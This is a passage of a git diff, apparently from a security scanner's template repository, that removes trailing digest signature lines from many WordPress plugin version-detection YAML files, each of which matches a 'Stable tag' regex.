4a0a00473045022049bc063f3c2909c77ff1eb346dc52e3930badef7e5fda6b48e9a677d8227ea7302210096ad47052ab9f09d214dde88dbec98d42c4912d904aee78e84b9ba0de4c0526d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 62c1961d3d..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cacb85b80ecbc7066077ecc86b53b6f10ee209c12d1f0df73c0db36686c5aa53022009a20e93a30cb9fc2e63aa796fc1ea01ab4d7c204bac5724e2c13dcbfa49f637:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 1eb855a653..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207510353709a6cb05451c4789bafff5a4d2f66f546c43d1087d364b7484e96d7902202bad7084505170121f6fb26cce3ca2c0309f7a94ca2af20f4f1dd5aef2caa1ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 8f6f8c25f2..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206ab0f33ee98765022ed4b92eb65a3c1564c92ec1cb8959d80f0e7bb76c6de6710221009ef99b7328c219d764bfda31b8a7f3fe93660ece418526ad8a9d206e8ef91167:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index f4bc858bde..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100db93e752e345e74f729c574b2ae080e5ef04c854e330c6172c80e6fe68a3b3da022069ab24146edb0af052fa3177a991243faa11a7db522bf60190ea90b4e6ae2efd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 12b1f28120..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220109aa0c6f8858f4751cd611ec4baffd50feb2cdbd591606a51c75ef5fb8cdd8b022077eeb08d84ec1b8b6f8a26425429b643e3095e8fa3ae9395fbdd14236314c326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index a9bf94fee1..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220284c4c0ffdc8ee7957c3f5c6390776a048083033ba2edff60c974e376cc0d55e022100d760f22c5ffa6383be4f185ceebbbd56f852a1eee6215dfe0249daeeb8a9be3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index e0383aa328..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200fe461370f206be5afc9a9dc6040862085559fc5b2925e30d1f52e84c6baf08e022100d30ad6a7d9f4467ea2ee2b22b83264574032c8c26deaf2d822ce4271043e2c48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 5ccf89eac4..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210084f506554b53ce73437fb9a4a5017025b31567965bf1b257becc76a2c05dfa3f0220736b2bf5c5c3b5ecc9caa8e215025ba64d8fad1688f97516ee9784558391f2ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 1e80a3c7e5..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220688205650cc4f19a37fef857d5da44681e79c661f87a94f59bbcb62ac7969a3102202026dedda9b8b69374c20f0686dcd7a9ec5186b042f803b448a3965add393c4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index d8ddb9c589..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201c086cc833ceee38f09f49dbbd30c89afcf5bad6afe61795177f867f3770499702206b826e4b198f5542caa61ab3e174a72a5479fd1c1fe6851dedd7243b9db63dc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index de5d281177..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200525e8f4c54756ef07238611241e18874db0906d5f40f47e182822b2e888276f022100e0ad3d78c2b0ce86b0304d44aaca0f29c2ab5d01bd49e30aa9e3ab6dde27b938:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 622360c446..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e2371901d44075384beacb73adacbc2cba3db20e9da81db6c001abc99d9e72c9022100ceabbbdba1a44f406ed0895e6515ed748bc3d2390cb28387d5091e1486e08214:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a28599db87..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008c667a1c6ee5adc8c89a2670308dbc34647b712cc42421dace42a60fefb7f71302201cbcef95239e2e0489904a2261ae86bc5208db8956b506c645d8e3c95dfe2a0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index ec13e9029d..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203605ddf17d02f5431e25ebbe1f0fc44c0ff08510c5ce7632fe78f5e1a612f9ef0220478de3aaa527a11042148e58eac7570f6a126dd727892510384e32eae69ba435:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b9a278499e..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203e52e105e681e78994a7cc7246339754922cad068b3c6fed7210c25d93338ed3022055949c4164961ad00cdb4016797c0c9962b581624cb6bc8cf35172ab0de4ea9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 4c54dab98d..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022053c5094c297797a55ba4121f33c73789d4e56913829590f34ca77c4c90211fc902204a57252790a14ff39b8aef472d183662938296f751a6446e5237f89ef25a7c63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index f56ffdd37c..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d84dee7574771332c76a2bc45a53ad783930e4b8644db6fc4a80f13d74b1ce6802210099e63cbb7ec6a9fef933b564486997e73c2e9dd74ac119253f7874e282f5cf3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 66030de838..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008cec7517444aafdbb2b4858f143f3df409ca7d8d7a583cde9b7d00f7eb6726c5022100e5e52e695d1327bc5f3699751a6aa1f6b2526a47293479214be6b179f380ac4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index b64bb94f0b..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206803a41ea002c5d9dd985d4b18a98feb41c8f2227102264063953186c920b19402207e1ba5615940ad0c106be428a6d4a92908ac00434074e975d7f108e01741164e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bb9cfec77f..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220741055d09d944f33347dfe74713ce37f8e02f5e5bce663ccaaeb4622b9bf08a1022100ba9ddab77c65be60f54658cedeea6fb80413e429595e7df4bf6bc3ae9b44fb79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 37e446fe98..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202c5dc7a378fa5515f3f3bd442a1597bf3d150aa2596382e0d27b0fe3bd97583f022100d87397ba95b5d05f87f442243f878d4ce566fbf5f5c495aa97258d483e24757e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 93ed77bb65..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f8e8bce5b375abd0c94c8d223c49980021b5525e2b45fb395195c69cd0be585b022100b233686efcbbc44d5bca39f4412ea22b081ce18075305a8187b0644c13066093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index c794e0e085..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008498a8794f7fa8822e661e604ea035d98a26c2bd9a8924f32ae8b6cd29a2f5f5022100f80dc20de55e291d4e68d1ba55f4fc18c7c8e5521a914a6e744cdf7dd89e3686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f54b5deea8..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022009aaf0fc7cfade6d7f76edfadb6fce6d750dcd85e11b6f0e106ce378832c829c022100ec20cc6ff22c8b11b12fad37c55feddeb9edbbfb6c5c240e0eff144aac6b16e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index cba6644cc3..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220021e6ecee5bafe3904e5a4c3c7efef5bc85295fb7883a6263c98090b99d6a2860221008ad7a03a07c6cb2499f457c7b4e169ae91cfeb9cf2c6b324b77bd8fc37c00052:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 2ae58519ed..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fcfb44affe761691c4acc1a41c8443d5e87a8c13cce10a76a1f559dbf9facb5c022100ef1fa05eff245231cf07ecb944e59b807d93c5b625a1712e0a86a269ea0ad66a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 3c1e37f4c5..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207134ca17131683f9659b38556b52a596a63375b7b3862a61aa47641b0190956c02202f03dc8c0f02e31e9d18e8a6ef5106dce43b88debbbc752607bd98e4aeed37e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index abf510e105..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220797c5545d1ab5441bbf00e6931e2401a70f50d10271c7e4621536f387abc0ddc022070579512aeeee26ccada4f8832c30f69d348d5c6c969aa5de2f46fcc4ad2ff9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 5a975ef149..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201c9bdbb210ef7cf9c7120f40b742b3d7ecd217b81f246da504eb6f6253afd7e7022100d97b626f668233eb407847db93094b3cf39d5c75015ff8989acdf07134d9ed24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index d0ab9576ef..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210095b74b0e2da022166c152720fd6d4a05dc8f04992ff5d5c8ad15c5e910dad15c022100fbeea3290c41a3a911013df21c94ea6b2b07dcb02ae21328da0bb69d80e4e352:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2841f0f5af..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201843a26ec9e5a7b385d21839bfa1a2bd6fa829eda2d3984ca2460cd15f8bb65a02206c120227d75a51897f0017d61cd9aa993cb38d1e85ba3e15b492a4ea5b64d4b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 816ff1e27b..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a5bd6ff033b70a16ab69f43996bcc126891af71d81e5c756cbd109b6d9e9c0520221009c8051d42265aa79297ad882fd1e22ae0199173de3f650fa572f8f5eb1ea8e61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 85dbdf03bf..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210099e0d3d1dba9abc1844830ee9907aa6fb9076e4340f5e7a5919c4896bc91e870022100c18e625590b130d281b15ccd4ee396b3fc8f76242285d2b403a0e0064239454d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 46945ee30a..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009e9b36d6847981c4dd0484297323bd154ecb690d21c3bf7e80ab18d47d2c140b0221009061c653f0ed6c3e1d81cf8aad0048b80642b5968d7b1b21f032f0a72f1668d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index c29867c534..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204fa7f53660950902415c3090734620c1cc2c95deda7de910c3f5c388dd182ed3022100ee4ec4fc55bc40bac3b49ff6c52f2eb798a87f7ce0aab5e371b0435bbf59791b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 3b3ec6df96..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a93cf23ca70d39410751e8f849290b08aee51b267187410d7a8f1ab9ea830df20220497453117be35d778ab0f804565cce9e41a6fba89425de68cf200c84a24a7177:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 369d17cd29..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210082e05267bb299df0f89c7a9ce9fb529bfafc5d8a729512ad1d5567bb366c922002200dcd36e07a61d7a1e7d1390cb88e7c50e5debfa6bda5d5fdbdf94c9a52c6f21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 62bfcd1f6e..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200b8a5aee809ddc641073c7373307655213808d8338ff3087a7f3a01f11cfd905022009042afe1f7835f5e8fda422b0f7c3472953983617c36721a2e4c4da189932a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index ceebae91f3..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206e06892608b6858d9ad91c5a2f287ae74d9a39bd923057038a6da35808b407f902203c1239777b509b832359b56a60b0d72025b4174e330466f4a1d1c7a31bac9cc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index ddaaba4004..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202dcc88ae6e35cc701426df39cb5beb4df9b0444a680f7cc39b57cf9bfe58a5cf022100b334e844d7efe18c6f3b800c9ee905ab7d0c58ceda5239e113eb122140915774:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index ebf6358791..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ae39757cb358afcddc9d8777d27523e807d351bd459bee4137b31fc69950bc5f02201420b7384c506d10904749d4971c7f28a9712ddc0859a8fe720542ec73ad51e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index f76c7050a1..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220751764b67ce0a9087e1ec201c61157de0ebc9880b4fdf6e2446e603885d674bf022100fcece1c402762621b4e67a33114d4c0d6105757702ebfbbcbcc3973ccf8c5b6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index eb98485422..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d80e2575b186c916a64261423c6745861b89e6c354bac56c7bdd500944d8cb4e02200be57d84eb831129352d68074b7945385203a36dd06a18208f0403a766096155:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 9293472896..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210083f34cf0a25d45934cb5c0406d8553debdc2d3b4fd35e1e5b3c4938ed73ccc6e022100b0a4132b7e57e64e2d28f331869304860222bc62bcb6c3a7b7e2f5368990c029:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 013566f4a1..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022047fb6f8764c7e66038652c1b954fa2c5971dc18dfb88da5c62d988cfc6bbafaa02202a5e2c9fab5462c4e39376d52fdc64376eb0519cffbf5a6c6a91c1d86a996f87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7e2c97da64..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200e6fdd9b6ff3df7edc8286e4b7c4c492de45f9e3f01cf06a61b1236a2309748d02207c9d21c305646a0203769f09ecaf99cda9a746644a9902197df429fcae5d756f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 61d2c4ca51..6f65d087e4 100644 --- 